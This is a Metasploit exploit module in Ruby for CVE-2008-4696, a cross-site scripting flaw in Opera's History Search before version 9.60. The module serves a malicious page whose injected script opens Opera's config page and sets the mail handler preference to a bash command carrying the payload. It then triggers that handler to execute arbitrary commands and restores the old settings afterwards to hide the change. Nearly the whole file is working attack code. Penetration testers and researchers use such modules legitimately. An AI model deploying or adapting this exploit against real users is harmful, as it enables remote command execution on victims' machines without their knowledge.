161 lines
3.9 KiB
Ruby
161 lines
3.9 KiB
Ruby
|
##
|
||
|
# $Id$
|
||
|
##
|
||
|
|
||
|
##
|
||
|
# This file is part of the Metasploit Framework and may be subject to
|
||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||
|
# Framework web site for more information on licensing and terms of use.
|
||
|
# http://metasploit.com/projects/Framework/
|
||
|
##
|
||
|
|
||
|
|
||
|
require 'msf/core'
|
||
|
|
||
|
|
||
|
class Metasploit3 < Msf::Exploit::Remote
|
||
|
|
||
|
include Msf::Exploit::Remote::HttpServer::HTML
|
||
|
|
||
|
def initialize(info = {})
|
||
|
super(update_info(info,
|
||
|
'Name' => 'Opera historysearch XSS',
|
||
|
'Description' => %q{
|
||
|
Certain constructs are not escaped correctly by Opera's History
|
||
|
Search results. These can be used to inject scripts into the
|
||
|
page, which can then be used to modify configuration settings
|
||
|
and execute arbitrary commands.
|
||
|
},
|
||
|
'License' => BSD_LICENSE,
|
||
|
'Author' =>
|
||
|
[
|
||
|
'Roberto Suggi', # Discovered the vulnerability
|
||
|
'Aviv Raff <avivra [at] gmail.com>', # showed it to be exploitable for code exec
|
||
|
'egypt', # msf module
|
||
|
],
|
||
|
'Version' => '$Revision: 5773 $',
|
||
|
'References' =>
|
||
|
[
|
||
|
['BID', '31869'],
|
||
|
['OSVDB', '49472'],
|
||
|
['CVE', '2008-4696'],
|
||
|
['URL', 'http://www.opera.com/support/kb/view/903/'],
|
||
|
],
|
||
|
'Payload' =>
|
||
|
{
|
||
|
'ExitFunc' => 'process',
|
||
|
'Space' => 4000,
|
||
|
'DisableNops' => true,
|
||
|
'BadChars' => "\x09\x0a\x0d\x20",
|
||
|
},
|
||
|
'Targets' =>
|
||
|
[
|
||
|
#[ 'Automatic', { } ],
|
||
|
#[ 'Opera < 9.60 Windows',
|
||
|
# {
|
||
|
# 'Platform' => 'win',
|
||
|
# 'Arch' => ARCH_X86,
|
||
|
# }
|
||
|
#],
|
||
|
[ 'Opera < 9.60 Unix Cmd',
|
||
|
{
|
||
|
'Platform' => 'unix',
|
||
|
'Arch' => ARCH_CMD,
|
||
|
}
|
||
|
],
|
||
|
],
|
||
|
'DisclosureDate' => ''
|
||
|
))
|
||
|
end
|
||
|
|
||
|
def on_request_uri(cli, request)
|
||
|
|
||
|
headers = {}
|
||
|
html_hdr = %Q^
|
||
|
<html>
|
||
|
<head>
|
||
|
<title>Loading</title>
|
||
|
^
|
||
|
html_ftr = %Q^
|
||
|
</head>
|
||
|
<body >
|
||
|
<h1>Loading</h1>
|
||
|
</body></html>
|
||
|
^
|
||
|
|
||
|
case request.uri
|
||
|
when /[?]jspayload/
|
||
|
p = regenerate_payload(cli)
|
||
|
if (p.nil?)
|
||
|
send_not_found(cli)
|
||
|
return
|
||
|
end
|
||
|
# We're going to run this through unescape(), so make sure
|
||
|
# everything is encoded
|
||
|
penc = Rex::Text.to_hex(p.encoded, "%")
|
||
|
content =
|
||
|
%Q{
|
||
|
var s = document.createElement("iframe");
|
||
|
|
||
|
s.src="opera:config";
|
||
|
s.id="config_window";
|
||
|
document.body.appendChild(s);
|
||
|
setTimeout(function () {location.href='about:blank'},1000);
|
||
|
config_window.eval(
|
||
|
"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
|
||
|
"old_app = opera.getPreference('Mail','External Application');" +
|
||
|
"old_handler = opera.getPreference('Mail','Handler');" +
|
||
|
"opera.setPreference('Mail','External Application',cmd);" +
|
||
|
"opera.setPreference('Mail','Handler','2');" +
|
||
|
"app_link = document.createElement('a');" +
|
||
|
"app_link.setAttribute('href', 'mailto:a@b.com');" +
|
||
|
"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},500);" +
|
||
|
"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},500);" +
|
||
|
"setTimeout(function () {location.href='about:blank'},500);" +
|
||
|
"app_link.click();" +
|
||
|
"");
|
||
|
}
|
||
|
|
||
|
when /[?]history/
|
||
|
js = %Q^
|
||
|
window.onload = function() {
|
||
|
location.href = "opera:historysearch?q=*";
|
||
|
}
|
||
|
^
|
||
|
content = %Q^
|
||
|
#{html_hdr}
|
||
|
<script><!--
|
||
|
#{js}
|
||
|
//--></script>
|
||
|
#{html_ftr}
|
||
|
^
|
||
|
when get_resource()
|
||
|
print_status("Sending #{self.name} to #{cli.peerhost} for request #{request.uri}")
|
||
|
|
||
|
js = %Q^
|
||
|
window.onload = function() {
|
||
|
url = location.href;
|
||
|
location.href = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
|
||
|
}
|
||
|
^
|
||
|
content = %Q^
|
||
|
#{html_hdr}
|
||
|
<script><!--
|
||
|
#{js}
|
||
|
//--></script>
|
||
|
#{html_ftr}
|
||
|
^
|
||
|
else
|
||
|
print_status("Sending 404 to #{cli.peerhost} for request #{request.uri}")
|
||
|
send_not_found(cli)
|
||
|
return
|
||
|
end
|
||
|
content.gsub!(/^\t{4}/, '')
|
||
|
content.gsub!(/\t/, ' ')
|
||
|
|
||
|
send_response_html(cli, content, headers)
|
||
|
handler(cli)
|
||
|
end
|
||
|
|
||
|
end
|